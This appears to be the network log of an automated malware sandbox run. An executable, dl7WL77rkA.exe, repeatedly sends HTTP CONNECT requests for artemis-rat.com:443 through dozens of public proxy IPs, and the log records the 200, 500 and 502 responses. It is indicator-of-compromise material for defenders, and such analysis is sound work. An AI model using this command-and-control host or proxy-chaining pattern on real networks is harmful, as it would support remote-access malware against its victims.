                                                                                                                                                                                                                                                            2159192.168.2.55533770.166.167.55577453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.259579897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2160192.168.2.55334638.41.53.14990903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.262116909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.623689890 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2161192.168.2.55324641.57.6.3060603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.265206099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2162192.168.2.555002185.5.209.101803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.273366928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:06.579030037 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:07.241755962 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:08.169958115 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:10.005670071 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:13.683154106 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@exam
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.346360922 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@exam
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.023890018 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:28.366847038 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:43.033998966 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2163192.168.2.553292103.125.154.23380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.279284954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2164192.168.2.5533418.222.239.209803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.285044909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389487028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.405348063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.405445099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2165192.168.2.555113184.170.245.14841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.287230968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2166192.168.2.555463206.220.175.241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.320280075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2167192.168.2.553456192.163.202.88609643876C:\Users\user\Desktop\dl7WL77rkA.exe


















                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2176192.168.2.555305103.179.182.15988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.360167980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.809405088 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2177192.168.2.555355162.214.165.203803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.360169888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.514615059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.608315945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.713964939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2178192.168.2.55348849.48.64.13080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.360577106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.990056992 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2179192.168.2.554075147.75.34.86100083876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.360578060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.663963079 CET356INHTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: Zscaler/6.3
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2180192.168.2.55549636.93.157.4956783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.367409945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2181192.168.2.553455180.183.113.9980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.367537022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.749325037 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2182192.168.2.555178192.111.130.5170023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.418725014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2183192.168.2.55363051.158.119.71163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.433968067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.498780966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.595140934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.701941967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2184192.168.2.55355445.173.12.14119943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2193192.168.2.553774107.180.95.177647313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.441956997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.498781919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.595139980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.701961994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2194192.168.2.553682135.148.10.161411463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.444593906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2195192.168.2.553782162.241.46.40414423876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.497452021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2196192.168.2.553689107.180.95.177639513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.498259068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.514615059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2197192.168.2.553712177.87.250.669993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.499823093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
